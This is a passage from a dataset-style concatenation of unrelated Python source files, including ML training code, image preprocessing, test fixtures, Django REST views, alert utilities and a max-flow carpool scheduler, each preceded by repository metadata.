"_id": "02_2019-02-29",
"date_string": '2019-01-29',
"spl_id": '01',
"roomtype_count": '1022',
"roomtype_has_mapping_count": '500',
"update": time.strftime('%Y-%m-%d', time.localtime(time.time()))
}
test_table.save(data)
res_data = test_table.find_one("02_2019-02-29")
print(res_data)
#
# # 查
aa = test_table.find_one({"_id": '022_2019-02-29'})
print(aa)
| 2.515625 | 3 |
visualdet3d/networks/detectors/__init__.py | tamnguyenvan/visualdet3d-tf | 0 | 12767370 | <reponame>tamnguyenvan/visualdet3d-tf
from .yolostereo3d_detector import YOLOStereo3DCore | 0.835938 | 1 |
activelearning/utils.py | xiaoqiqi177/DR-segmentation | 2 | 12767371 | import os
import glob
from preprocess import clahe_gridsize
import cv2
train_ratio = 0.7
eval_ratio = 0.3
test_ratio = 0.
def get_images(image_dir, preprocess=False, phase='train', healthy_included=True):
if preprocess:
limit = 2
grid_size = 8
if not os.path.exists(os.path.join(image_dir, 'ApparentRetinopathy_CLAHE')):
os.mkdir(os.path.join(image_dir, 'ApparentRetinopathy_CLAHE'))
os.mkdir(os.path.join(image_dir, 'NoApparentRetinopathy_CLAHE'))
apparent_ori = glob.glob(os.path.join(image_dir, 'ApparentRetinopathy/*.jpg'))
noapparent_ori = glob.glob(os.path.join(image_dir, 'NoApparentRetinopathy/*.jpg'))
apparent_ori.sort()
noapparent_ori.sort()
# mean brightness.
meanbright = 0.
for img_path in apparent_ori + noapparent_ori:
img_name = os.path.split(img_path)[-1].split('.')[0]
mask_path = os.path.join(image_dir, 'GroundTruth', 'MASK', img_name+'_MASK.tif')
gray = cv2.imread(img_path, 0)
mask_img = cv2.imread(mask_path, 0)
brightness = gray.sum() / (mask_img.shape[0] * mask_img.shape[1] - mask_img.sum() / 255.)
meanbright += brightness
meanbright /= len(apparent_ori + noapparent_ori)
# preprocess for apparent.
for img_path in apparent_ori:
img_name = os.path.split(img_path)[-1].split('.')[0]
mask_path = os.path.join(image_dir, 'GroundTruth', 'MASK', img_name+'_MASK.tif')
clahe_img = clahe_gridsize(img_path, mask_path, denoise=True, verbose=False, brightnessbalance=meanbright, cliplimit=limit, gridsize=grid_size)
cv2.imwrite(os.path.join(image_dir, 'ApparentRetinopathy_CLAHE', os.path.split(img_path)[-1]), clahe_img)
# preprocess for noapparent.
for img_path in noapparent_ori:
img_name = os.path.split(img_path)[-1].split('.')[0]
mask_path = os.path.join(image_dir, 'GroundTruth', 'MASK', img_name+'_MASK.tif')
clahe_img = clahe_gridsize(img_path, mask_path, denoise=True, verbose=False, brightnessbalance=meanbright, cliplimit=limit, gridsize=grid_size)
cv2.imwrite(os.path.join(image_dir, 'NoApparentRetinopathy_CLAHE', os.path.split(img_path)[-1]), clahe_img)
apparent = glob.glob(os.path.join(image_dir, 'ApparentRetinopathy_CLAHE/*.jpg'))
noapparent = glob.glob(os.path.join(image_dir, 'NoApparentRetinopathy_CLAHE/*.jpg'))
else:
apparent = glob.glob(os.path.join(image_dir, 'ApparentRetinopathy/*.jpg'))
noapparent = glob.glob(os.path.join(image_dir, 'NoApparentRetinopathy/*.jpg'))
apparent.sort()
noapparent.sort()
image_paths = []
mask_paths = []
if healthy_included:
imgset = [apparent, noapparent]
else:
imgset = [apparent]
for each in imgset:
train_number = int(len(each) * train_ratio)
eval_number = int(len(each) * eval_ratio)
if phase == 'train':
image_paths.extend(each[:train_number])
elif phase == 'eval':
image_paths.extend(each[train_number:train_number+eval_number])
else:
image_paths.extend(each[train_number+eval_number:])
mask_path= os.path.join(image_dir, 'GroundTruth')
lesions = ['EX', 'HE', 'MA', 'SE', 'MASK']
for image_path in image_paths:
paths = []
name = os.path.split(image_path)[1].split('.')[0]
for lesion in lesions:
candidate_path = os.path.join(mask_path, lesion, name+'_'+lesion+'.tif')
if os.path.exists(candidate_path):
paths.append(candidate_path)
else:
paths.append(None)
mask_paths.append(paths)
return image_paths, mask_paths
| 2.359375 | 2 |
src/slu/trainer.py | colincen/coach | 0 | 12767372 |
from src.slu.datareader import domain_set, y1_set, y2_set
from preprocess.gen_embeddings_for_slu import domain2slot
import torch
import torch.nn as nn
import os
from tqdm import tqdm
import numpy as np
import logging
logger = logging.getLogger()
from src.conll2002_metrics import *
class SLUTrainer(object):
def __init__(self, params, binary_slu_tagger, slotname_predictor, sent_repre_generator=None):
self.params = params
self.binary_slu_tagger = binary_slu_tagger
self.slotname_predictor = slotname_predictor
self.lr = params.lr
self.use_label_encoder = params.tr
self.num_domain = params.num_domain
if self.use_label_encoder:
self.sent_repre_generator = sent_repre_generator
self.loss_fn_mse = nn.MSELoss()
model_parameters = [
{"params": self.binary_slu_tagger.parameters()},
{"params": self.slotname_predictor.parameters()},
{"params": self.sent_repre_generator.parameters()}
]
else:
model_parameters = [
{"params": self.binary_slu_tagger.parameters()},
{"params": self.slotname_predictor.parameters()}
]
# Adam optimizer
self.optimizer = torch.optim.Adam(model_parameters, lr=self.lr)
self.loss_fn = nn.CrossEntropyLoss()
self.early_stop = params.early_stop
self.no_improvement_num = 0
self.best_f1 = 0
self.stop_training_flag = False
def train_step(self, X, lengths, y_bin, y_final, y_dm, templates=None, tem_lengths=None, epoch=None):
# print(X)
# print(lengths)
# print(y_bin)
# print(y_final)
# print(y_dm)
# print('-'*20)
self.binary_slu_tagger.train()
self.slotname_predictor.train()
if self.use_label_encoder:
self.sent_repre_generator.train()
bin_preds, lstm_hiddens = self.binary_slu_tagger(X, lengths)
# print(y_bin)
# y_bin_ = [i for i in y_bin]
# mx_len = max(lengths)
# # print(mx_len)
# for i in range(len(y_bin_)):
# while len(y_bin_[i]) < mx_len.item():
# y_bin_[i].append(0)
# y_bin_ = torch.tensor(y_bin_,device='cuda:0')
# print(y_bin_)
# print(bin_preds.size())
# loss_func = nn.CrossEntropyLoss(reduction='mean')
# t1 = bin_preds.view(-1, 3)
# t2 = y_bin_.view(-1)
# loss = loss_func(t1, t2)
# print(loss)
## optimize binary_slu_tagger
loss_bin = self.binary_slu_tagger.crf_loss(bin_preds, lengths, y_bin)
self.optimizer.zero_grad()
loss_bin.backward(retain_graph=True)
# self.optimizer.step()
# print(loss_bin)
## optimize slotname_predictor
pred_slotname_list, gold_slotname_list = self.slotname_predictor(y_dm, lstm_hiddens, binary_golds=y_bin, final_golds=y_final)
# for i in pred_slotname_list:
# print(i)
# print('-'*20)
# for i in gold_slotname_list:
# print(i)
# print('-'*20)
# print('-'*20)
# print(pred_slotname_list)
# print('-'*30)
# print(gold_slotname_list)
# return 1,0
# '''
# loss_slotname = torch.tensor(0)
# loss_slotname = loss_slotname.cuda()
with torch.autograd.set_detect_anomaly(True):
for pred_slotname_each_sample, gold_slotname_each_sample in zip(pred_slotname_list, gold_slotname_list):
assert pred_slotname_each_sample.size()[0] == gold_slotname_each_sample.size()[0]
# loss_slotname = loss_slotname + self.loss_fn(pred_slotname_each_sample, gold_slotname_each_sample.cuda())
loss_slotname = self.loss_fn(pred_slotname_each_sample, gold_slotname_each_sample.cuda())
# self.optimizer.zero_grad()
loss_slotname.backward(retain_graph=True)
# self.optimizer.step()
# loss = loss_bin + loss_slotname
# self.optimizer.zero_grad()
# # loss_slotname = loss_temp
# loss.backward()
# print(temp)
# self.optimizer.zero_grad()
# loss_slotname = temp
# self.optimizer.step()
if self.use_label_encoder:
templates_repre, input_repre = self.sent_repre_generator(templates, tem_lengths, lstm_hiddens, lengths)
input_repre = input_repre.detach()
template0_loss = self.loss_fn_mse(templates_repre[:, 0, :], input_repre)
template1_loss = -1 * self.loss_fn_mse(templates_repre[:, 1, :], input_repre)
template2_loss = -1 * self.loss_fn_mse(templates_repre[:, 2, :], input_repre)
input_repre.requires_grad = True
# self.optimizer.zero_grad()
template0_loss.backward(retain_graph=True)
template1_loss.backward(retain_graph=True)
template2_loss.backward(retain_graph=True)
# self.optimizer.step()
if epoch > 3:
templates_repre = templates_repre.detach()
input_loss0 = self.loss_fn_mse(input_repre, templates_repre[:, 0, :])
input_loss1 = -1 * self.loss_fn_mse(input_repre, templates_repre[:, 1, :])
input_loss2 = -1 * self.loss_fn_mse(input_repre, templates_repre[:, 2, :])
templates_repre.requires_grad = True
# self.optimizer.zero_grad()
input_loss0.backward(retain_graph=True)
input_loss1.backward(retain_graph=True)
input_loss2.backward(retain_graph=True)
self.optimizer.step()
if self.use_label_encoder:
return loss_bin.item(), loss_slotname.item(), template0_loss.item(), template1_loss.item()
else:
self.optimizer.step()
return loss_bin.item(), loss_slotname.item()
# '''
def evaluate(self, dataloader, istestset=False):
self.binary_slu_tagger.eval()
self.slotname_predictor.eval()
binary_preds, binary_golds = [], []
final_preds, final_golds = [], []
pbar = tqdm(enumerate(dataloader), total=len(dataloader))
for i, (X, lengths, y_bin, y_final, y_dm) in pbar:
binary_golds.extend(y_bin)
final_golds.extend(y_final)
X, lengths = X.cuda(), lengths.cuda()
bin_preds_batch, lstm_hiddens = self.binary_slu_tagger(X, lengths)
bin_preds_batch = self.binary_slu_tagger.crf_decode(bin_preds_batch, lengths)
binary_preds.extend(bin_preds_batch)
slotname_preds_batch = self.slotname_predictor(y_dm, lstm_hiddens, binary_preditions=bin_preds_batch, binary_golds=None, final_golds=None)
final_preds_batch = self.combine_binary_and_slotname_preds(y_dm, bin_preds_batch, slotname_preds_batch)
final_preds.extend(final_preds_batch)
# binary predictions
binary_preds = np.concatenate(binary_preds, axis=0)
binary_preds = list(binary_preds)
binary_golds = np.concatenate(binary_golds, axis=0)
binary_golds = list(binary_golds)
# final predictions
final_preds = np.concatenate(final_preds, axis=0)
final_preds = list(final_preds)
final_golds = np.concatenate(final_golds, axis=0)
final_golds = list(final_golds)
bin_lines, final_lines = [], []
for bin_pred, bin_gold, final_pred, final_gold in zip(binary_preds, binary_golds, final_preds, final_golds):
bin_slot_pred = y1_set[bin_pred]
bin_slot_gold = y1_set[bin_gold]
final_slot_pred = y2_set[final_pred]
final_slot_gold = y2_set[final_gold]
bin_lines.append("w" + " " + bin_slot_pred + " " + bin_slot_gold)
final_lines.append("w" + " " + final_slot_pred + " " + final_slot_gold)
bin_result = conll2002_measure(bin_lines)
bin_f1 = bin_result["fb1"]
final_result = conll2002_measure(final_lines)
final_f1 = final_result["fb1"]
if istestset == False: # dev set
if final_f1 > self.best_f1:
self.best_f1 = final_f1
self.no_improvement_num = 0
logger.info("Found better model!!")
self.save_model()
else:
self.no_improvement_num += 1
logger.info("No better model found (%d/%d)" % (self.no_improvement_num, self.early_stop))
if self.no_improvement_num >= self.early_stop:
self.stop_training_flag = True
return bin_f1, final_f1, self.stop_training_flag
def combine_binary_and_slotname_preds(self, dm_id_batch, binary_preds_batch, slotname_preds_batch):
"""
Input:
dm_id_batch: (bsz)
binary_preds: (bsz, seq_len)
slotname_preds: (bsz, num_slotname, slot_num)
Output:
final_preds: (bsz, seq_len)
"""
final_preds = []
for i in range(len(dm_id_batch)):
dm_id = dm_id_batch[i]
binary_preds = binary_preds_batch[i]
slotname_preds = slotname_preds_batch[i]
slot_list_based_dm = domain2slot[domain_set[dm_id]]
i = -1
final_preds_each = []
for bin_pred in binary_preds:
# values of bin_pred are 0 (O), or 1(B) or 2(I)
if bin_pred.item() == 0:
final_preds_each.append(0)
elif bin_pred.item() == 1:
i += 1
pred_slot_id = torch.argmax(slotname_preds[i])
slotname = "B-" + slot_list_based_dm[pred_slot_id]
final_preds_each.append(y2_set.index(slotname))
elif bin_pred.item() == 2:
if i == -1:
final_preds_each.append(0)
else:
pred_slot_id = torch.argmax(slotname_preds[i])
slotname = "I-" + slot_list_based_dm[pred_slot_id]
if slotname not in y2_set:
final_preds_each.append(0)
else:
final_preds_each.append(y2_set.index(slotname))
assert len(final_preds_each) == len(binary_preds)
final_preds.append(final_preds_each)
return final_preds
def save_model(self):
"""
save the best model
"""
saved_path = os.path.join(self.params.dump_path, "best_model.pth")
torch.save({
"binary_slu_tagger": self.binary_slu_tagger,
"slotname_predictor": self.slotname_predictor
}, saved_path)
logger.info("Best model has been saved to %s" % saved_path)
| 2.359375 | 2 |
shfl/private/reproducibility.py | joarreg/Sherpa.ai-Federated-Learning-Framework | 2 | 12767373 | import random
import numpy as np
import tensorflow as tf
class Reproducibility:
"""
Singleton class for ensure reproducibility.
You indicates the seed and the execution is the same. The server initialice this class and the clients only
call/get a seed.
Server initialize it with Reproducibility(seed) before all executions
For get a seed, the client has to put Reproducibility.get_instance().set_seed(ID)
Is important to know that the reproducibility only works if you execute the experiment in CPU. Many ops in GPU
like convolutions are not deterministic and the don't replicate.
# Arguments:
seed: the main seed for server
# Properties:
seed:
return server seed
seeds:
return all seeds
"""
__instance = None
@staticmethod
def get_instance():
"""
Static access method.
# Returns:
instance: Singleton instance class
"""
if Reproducibility.__instance is None:
Reproducibility()
return Reproducibility.__instance
def __init__(self, seed=None):
"""
Virtually private constructor.
"""
if Reproducibility.__instance is not None:
raise Exception("This class is a singleton")
else:
self.__seed = seed
self.__seeds = {'server': self.__seed}
Reproducibility.__instance = self
if self.__seed is not None:
self.set_seed('server')
def set_seed(self, id):
"""
Set server and clients seed
# Arguments:
id: 'server' in server node and ID in client node
"""
if id not in self.__seeds.keys():
self.__seeds[id] = np.random.randint(2**32-1)
np.random.seed(self.__seeds[id])
random.seed(self.__seeds[id])
tf.random.set_seed(self.__seeds[id])
@property
def seed(self):
return self.__seed
@property
def seeds(self):
return self.__seeds
def delete_instance(self):
"""
Remove the singleton instance. Not recommended for normal use. This method is necessary for tests.
"""
if Reproducibility.__instance is not None:
del self.__seed
del self.__seeds
Reproducibility.__instance = None
| 3.34375 | 3 |
cephlm/tests/cephmetrics/system/test_hpssacli.py | ArdanaCLM/cephlm | 0 | 12767374 | #!/usr/bin/env python
#
# (c) Copyright 2016 Hewlett Packard Enterprise Development LP
# (c) Copyright 2017 SUSE LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import unittest
from cephlm.tests.cephmetrics.system.test_data import HPssaCliData
from cephlm.cephmetrics.system.hpssacli import HPssaCli
from cephlm.common.exceptions import CephLMException
class TestHPssaCli(unittest.TestCase):
@mock.patch('swiftlm.hp_hardware.hpssacli.main')
def test_check_hpssacli_success(self, mock_hpssacli):
mock_hpssacli.return_value = HPssaCliData.MOCK_RESPONSE
result = HPssaCli.check_hpssacli()
for entry in result:
self.assertEqual(entry.dimensions['service'], 'ceph-storage')
self.assertTrue(entry.name.startswith('cephlm.hpssacli'))
@mock.patch('swiftlm.hp_hardware.hpssacli.main')
def test_check_hpssacli_failure(self, mock_hpssacli):
mock_hpssacli.side_effect = Exception("Unknown error")
regexp = "Unknown exception occured when " \
"executing swiftlm hpssacli module"
self.assertRaisesRegexp(CephLMException, regexp,
lambda: HPssaCli.check_hpssacli())
| 2.09375 | 2 |
chaos_genius/alerts/utils.py | rsohlot/chaos_genius | 320 | 12767375 | """Common utilities for alerts and alert digests."""
import os
from math import floor, log10
from typing import List, Optional, Union
from jinja2 import Environment, FileSystemLoader, select_autoescape
from chaos_genius.alerts.email import send_static_alert_email
from chaos_genius.core.utils.round import round_number
from chaos_genius.settings import CHAOSGENIUS_WEBAPP_URL
class AlertException(Exception):
"""A general exception in a specific alert.
Stores and prints alert ID and KPI ID.
"""
def __init__(self, message: str, alert_id: int, kpi_id: Optional[int] = None):
"""Initialize a new alert exception.
Args:
message: exception message.
alert_id: ID of alert where this originated from.
kpi_id: ID of KPI associated with the alert.
"""
if kpi_id:
message = f"(KPI: {kpi_id}, Alert: {alert_id}) {message}"
else:
message = f"(Alert: {alert_id}) {message}"
super().__init__(message)
def webapp_url_prefix():
"""Constructs webapp URL prefix with a trailing slash.
If not setup, this will be an invalid URL with an appropriate message.
TODO: redirect to docs link showing how to setup instead of invalid URL.
"""
if not CHAOSGENIUS_WEBAPP_URL:
return "Webapp URL not setup. Please setup CHAOSGENIUS_WEBAPP_URL in the environment file./"
forward_slash = "/" if not CHAOSGENIUS_WEBAPP_URL[-1] == "/" else ""
return f"{CHAOSGENIUS_WEBAPP_URL}{forward_slash}"
def change_message_from_percent(percent_change: Union[str, int, float]) -> str:
"""Creates a change message from given percentage change.
percent_change will be:
- "–" in case the last data point was missing or both the points had values 0
- 0 (int) in case there was no change
- positive value (int/float) in case there was an increase
- negative value (int/float) in case there was a decrease
"""
if isinstance(percent_change, str):
return percent_change
elif percent_change == 0:
return "No change (–)"
elif percent_change > 0:
return f"Increased by ({percent_change}%)"
else:
return f"Decreased by ({percent_change}%)"
def find_percentage_change(
curr_val: Union[int, float], prev_val: Optional[Union[int, float]]
) -> Union[int, float, str]:
"""Calculates percentage change between previous and current value."""
if prev_val is None:
# previous point wasn't found
return "–"
elif curr_val == 0 and prev_val == curr_val:
# both current and previous value are 0
return "–"
elif prev_val == 0:
# previous value is 0, but current value isn't
sign_ = "+" if curr_val > 0 else "-"
return sign_ + "inf"
else:
change = curr_val - prev_val
percentage_change = (change / prev_val) * 100
return round_number(percentage_change)
def send_email_using_template(
template_name: str,
recipient_emails: List[str],
subject: str,
files: List[dict],
**kwargs,
) -> None:
"""Sends an email using a template."""
path = os.path.join(os.path.dirname(__file__), "email_templates")
env = Environment(
loader=FileSystemLoader(path), autoescape=select_autoescape(["html", "xml"])
)
template = env.get_template(template_name)
send_static_alert_email(recipient_emails, subject, template.render(**kwargs), files)
HRN_PREFIXES = {
-9: "n",
-6: "µ",
-3: "m",
0: "",
3: "K",
6: "M",
9: "B",
12: "T",
}
def _get_exponent(num: float) -> int:
"""Returns the power of 10 to which the number is raised to."""
if num == 0:
return 0
return floor(log10(abs(num)))
def human_readable(num: float) -> str:
"""Returns the human readable format of a number."""
exponent = _get_exponent(num)
new_exponent = min((3 * floor(exponent / 3)), 12)
precision = 10 ** (new_exponent)
new_val = round(num / precision, 3)
human_readable_format = str(new_val) + HRN_PREFIXES[new_exponent]
return human_readable_format
| 2.421875 | 2 |
youtube_transcript_api/__init__.py | crhowell/youtube-transcript-api | 0 | 12767376 | <filename>youtube_transcript_api/__init__.py
from ._api import YouTubeTranscriptApi
from ._transcripts import TranscriptList, Transcript
from ._errors import (
TranscriptsDisabled,
NoTranscriptFound,
CouldNotRetrieveTranscript,
VideoUnavailable,
TooManyRequests,
NotTranslatable,
TranslationLanguageNotAvailable,
NoTranscriptAvailable,
CookiePathInvalid,
CookiesInvalid,
FailedToCreateConsentCookie,
)
| 1.351563 | 1 |
utils.py | ERUIHNIYHBKBNF/Digit-Recognition | 0 | 12767377 | <filename>utils.py
import cv2
import numpy as np
import os
def saveimg(img, name):
dirpath = "./train_data"
filepath = os.path.join(dirpath, name)
cv2.imwrite(filepath, img)
def showimg(img):
cv2.namedWindow("Image", 0)
cv2.imshow("Image", img)
cv2.waitKey(0)
def showImgWithCons(img, cons):
cv2.drawContours(img, cons, -1, (0, 0, 255), 1)
showimg(img)
def showImgWithRect(img, boundings):
for rect in boundings:
[x, y, w, h] = rect
cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)
showimg(img)
# OpenCV的knn模型要求train_data应该是一个二维数组
# 其中每个元素都是将图片展开成一维,值是float32表示的颜色值
# 构造一个digit数组,长度是img的 hegiht * width
# 由于img灰度二值处理过,rgb三个值相同取一个即可
def rgbToFloat32(img):
data = []
for i in range(0, len(img)):
for j in range(0, len(img[i])):
data.append(img[i][j][0])
return np.array(data, dtype='float32') | 3.125 | 3 |
src/graph_build/tests/otp_graph_import/conftest.py | hellej/hope-green-path-server | 5 | 12767378 | <filename>src/graph_build/tests/otp_graph_import/conftest.py
import os
import pytest
from graph_build.otp_graph_import.conf import OtpGraphImportConf
conf = OtpGraphImportConf(
node_csv_file = 'graph_build/tests/otp_graph_import/data/test_nodes.csv',
edge_csv_file = 'graph_build/tests/otp_graph_import/data/test_edges.csv',
hma_poly_file = 'graph_build/tests/common/HMA.geojson',
igraph_out_file = 'graph_build/tests/otp_graph_import/temp/test_graph.graphml',
b_export_otp_data_to_gpkg = False,
b_export_decomposed_igraphs_to_gpkg = False,
b_export_final_graph_to_gpkg = False,
debug_otp_graph_gpkg = None,
debug_igraph_gpkg = None
)
all_nodes_fp = 'graph_build/otp_graph_import/otp_nodes.csv'
all_edges_fp = 'graph_build/otp_graph_import/otp_edges.csv'
kumpula_nodes_fp = 'graph_build/tests/otp_graph_import/data/kumpula_nodes.csv'
kumpula_edges_fp = 'graph_build/tests/otp_graph_import/data/kumpula_edges.csv'
kumpula_aoi_fp = 'graph_build/tests/otp_graph_import/data/kumpula_aoi.geojson'
graph_import_graph_out_dir = r'graph_build/tests/otp_graph_import/temp/'
@pytest.fixture(scope='session', autouse=True)
def remove_test_exports():
files_to_rm = os.listdir(graph_import_graph_out_dir)
for fn in files_to_rm:
if fn == '.gitignore':
continue
os.remove(fr'{graph_import_graph_out_dir}{fn}')
print(f'Removed test data: {graph_import_graph_out_dir}{fn}')
| 1.765625 | 2 |
sso_trial/routing.py | ujjawal01/temporary-repo | 0 | 12767379 | <reponame>ujjawal01/temporary-repo
from channels.routing import ProtocolTypeRouter, URLRouter
from django.conf.urls import url
from channels.http import AsgiHandler
from channels.auth import AuthMiddlewareStack
import news.routing
application = ProtocolTypeRouter({
"websocket": AuthMiddlewareStack(
URLRouter(
news.routing.websocket_urlpatterns
)
),
}) | 1.796875 | 2 |
setup.py | Tinggaard/pathfinding | 0 | 12767380 | <gh_stars>0
from setuptools import setup
setup(
name='pathfinding',
version='0.1.0',
# metadata
author='<NAME>',
author_email='<EMAIL>',
description='Using pathfinding algorithms to solve mazes.',
keywords='pathfinding maze labyrith astar dijkstra breadthfirst depthfirst solving daedalus',
url='https://github.com/Tinggaard/pathfinding',
license=open('LICENSE').read(),
long_description=open('README.md', encoding='utf-8').read(),
long_description_content_type='text/markdown',
python_requires='>=3.6', #tested with
zip_safe=False,
py_modules=[
'pathfinding/main',
],
install_requires=[
'numpy', # basic structure of Graph
'pillow', # image loader and writer
'pydaedalus', # maze generator
'matplotlib', # video handler and plotter
'celluloid', # video renderer wrapper
'click', # arg handler
'colorama' # windows colors in terminal
],
entry_points={
'console_scripts': ['pathfinding=pathfinding.main:cli']
},
)
| 1.296875 | 1 |
carpool.py | JackMao981/Carpool | 0 | 12767381 | import numpy as np
import math
from generate_schedule import *
def adjacent(g,node, n):
"""
find all adjacent nodes of input node in g
g: 2D array of numbers, the adjacency matrix
node: int, the node whose neighber you wanna find
return: a list of ints
"""
result = []
for i in range(n):
if g[node][i] != 0:
result.append(i)
return result
def bfs(s, t, parent, g, n):
"""
breadth first search algorithm
s: int, source
t: int, sink
parent: list, the list of parents relative to the index that represent nodes
g: 2D array of numbers, the adjacency matrix
node: int, the node whose neighber you wanna find
return: (bool, list), returns a boolean telling you if there is a path between
s and t, and returns the path in the form of a parent list
"""
visited = [False] * n
queue = []
queue.append(s)
visited[s] = True
while queue:
u = queue.pop(0)
for idx in adjacent(g, u, n):
if visited[idx] == False:
parent[idx] = u
# print("parent",parent)
if idx == t:
visited[idx] = True
return True, parent
queue.append(idx)
visited[idx] = True
return False, parent
def edmond_karp(g,n):
"""
Main function for edmond karp algorithm
g: 2D array of numbers, the adjacency matrix
node: int, the node whose neighber you wanna find
n: int, number of nodes
return: int, max flow
"""
source = 0
sink = len(g) - 1
parent = [-1]*n
max_flow = 0
while(bfs(source, sink, parent, g, n)[0]):
parent = bfs(source, sink, parent, g, n)[1]
path_flow = math.inf
s = sink
while (s != source):
path_flow = min(path_flow, g[parent[s]][s])
# print(path_flow)
s = parent[s]
max_flow += path_flow
v = sink
while(v != source):
u = parent[v]
# print("graph",g[u][v], "path", path_flow)
g[u][v] -= path_flow
g[v][u] += path_flow
v = parent[v]
return max_flow
def print_g(g):
"""
prints the graph, a helper function for clarity
"""
for i in g:
for j in i:
print(round(j,2), "\t", end = '')
print("\n")
# print(bfs(0,10,[-1]*n))
def print_schedule(g, p, n):
"""
prints the schedule; row: people, columns: days
"""
print( "\t\t", end = '')
for i in range(1, n-1-p):
print("day", i, "\t", end = '')
print()
for j in range(1, p+1):
print("person", j, "\t", end = '')
for i in range(p+1, n-1):
print(round(g[i][j],2), "\t", end = '')
print("\n")
| 3.9375 | 4 |
Python-Fundamentals/Dictionaries/statistics.py | Xamaneone/SoftUni-Intro | 0 | 12767382 | data = input()
products = {}
while not data == "statistics":
product, quantity = data.split(": ")
quantity = int(quantity)
if product in products:
products[product] += quantity
else:
products[product] = quantity
data = input()
print("Products in stock:")
for product in products:
print(f"- {product}: {products[product]}")
print(f"Total Products: {len(products)}")
print(f"Total Quantity: {sum(products.values())}")
| 3.96875 | 4 |
tracardi_aws_sqs/model/model.py | Tracardi/tracardi-aws-sqs-connector | 0 | 12767383 | from typing import Any
from pydantic import validator, create_model, AnyHttpUrl
from pydantic.main import BaseModel
from tracardi.domain.entity import Entity
class AwsIamAuth(BaseModel):
aws_access_key_id: str
aws_secret_access_key: str
class Content(BaseModel):
content: str
type: str
@validator('content')
def must_have_2_letters(cls, v):
if len(v) < 2:
raise ValueError('String is too short. String must be at least two letters long.')
return v
class AwsSqsConfiguration(BaseModel):
source: Entity
message: Content
region_name: str
queue_url: AnyHttpUrl
delay_seconds: int = 0
message_attributes: str
class MessageAttribute:
def __init__(self, value):
self.value = value
if isinstance(value, bool) or isinstance(value, str):
self.type = "String"
self.key = "StringValue"
self.value = str(value)
elif isinstance(value, int) or isinstance(value, float):
self.type = "Number"
self.key = "StringValue"
self.value = str(value)
else:
self.type = "String"
self.key = "StringValue"
self.value = str(value)
def dict(self):
return {
"DataType": self.type,
self.key: self.value
}
class MessageAttributes:
def __init__(self, values: dict):
self._value = {}
for key, value in values.items():
if isinstance(value, dict) or isinstance(value, list):
raise ValueError("Attributes must be key value pairs. Allowed values are strings and "
"numbers")
self._value[key] = MessageAttribute(value)
def dict(self):
return {key: value.dict() for key, value in self._value.items()}
| 2.703125 | 3 |
inventory/api/api_views.py | jeff-eng/Commune | 1 | 12767384 | from rest_framework import permissions
from rest_framework.generics import ListAPIView, CreateAPIView, RetrieveUpdateDestroyAPIView
from rest_framework.exceptions import ValidationError
from inventory.api.serializers import AssetSerializer, BorrowerSerializer, CategorySerializer
from inventory.models import Asset, Borrower, Category
from inventory.permissions import IsOwnerOrReadOnly
class AssetRetrieveUpdateDestroy(RetrieveUpdateDestroyAPIView):
lookup_field = 'uid'
serializer_class = AssetSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]
def get_queryset(self):
# return Asset.objects.filter(owner=self.request.user)
return Asset.objects.all()
class BorrowerRetrieveUpdateDestroy(RetrieveUpdateDestroyAPIView):
lookup_field = 'id'
serializer_class = BorrowerSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
def get_queryset(self):
return Borrower.objects.all()
class AssetList(ListAPIView):
serializer_class = AssetSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
def get_queryset(self):
"""
This view returns a list of all the assets owned by the currently authenticated user.
"""
return Asset.objects.filter(owner=self.request.user)
class CategoryList(ListAPIView):
serializer_class = CategorySerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = Category.objects.all()
class BorrowerList(ListAPIView):
serializer_class = BorrowerSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
def get_queryset(self):
return Borrower.objects.filter(associated_user=self.request.user)
class AssetCreate(CreateAPIView):
serializer_class = AssetSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
def perform_create(self, serializer):
serializer.save(owner=self.request.user)
def create(self, request, *args, **kwargs):
try:
name = request.data.get('name')
if name is not None and len(name) < 1:
raise ValidationError({'name': 'Must be at least one character in length.'})
except ValueError:
raise ValidationError({'name': 'Valid characters only.'})
return super().create(request, *args, **kwargs)
def get_queryset(self):
return Asset.objects.filter(owner=self.request.user)
class BorrowerCreate(CreateAPIView):
serializer_class = BorrowerSerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
def get_queryset(self):
return Borrower.objects.filter(associated_user=self.request.user)
class CategoryCreate(CreateAPIView):
serializer_class = CategorySerializer
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
queryset = Category.objects.all() | 2.171875 | 2 |
envios/api/models.py | serivt/aes-amazoom | 0 | 12767385 | <filename>envios/api/models.py
from django.db import models
class Shipping(models.Model):
product = models.CharField(max_length=2023)
address = models.CharField(max_length=2023)
amount = models.IntegerField()
total_price = models.FloatField()
def __str__(self):
return self.product
@property
def precio(self):
return self.total_price / self.amount
@precio.setter
def precio(self, precio):
self.total_price = precio * self.amount
| 2.84375 | 3 |
gammapy/time/tests/test_exptest.py | contrera/gammapy | 0 | 12767386 | <gh_stars>0
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import absolute_import, division, print_function, unicode_literals
from numpy.testing import assert_allclose
from astropy.units import Quantity
from ..exptest import exptest
from ..simulate import random_times
def test_exptest():
rate = Quantity(10, "s^-1")
time_delta = random_times(100, rate=rate, return_diff=True, random_state=0)
mr = exptest(time_delta)
assert_allclose(mr, 0.11395763079)
| 1.742188 | 2 |
SpiderNest/core/regexs.py | thomaszdxsn/SpiderNest | 1 | 12767387 | """
author: thomaszdxsn
"""
import re
__all__ = ('RE_DATETIME', 'RE_IMG_SRC', 'RE_DATE', 'RE_UNIT_NUM', 'RE_CHINESE')
RE_DATETIME = re.compile(r'\d{2,4}-\d{1,2}-\d{1,2} \d{1,2}:\d{1,2}:\d{1,2}')
RE_DATE = re.compile(r'\d{2,4}-\d{1,2}-\d{1,2}')
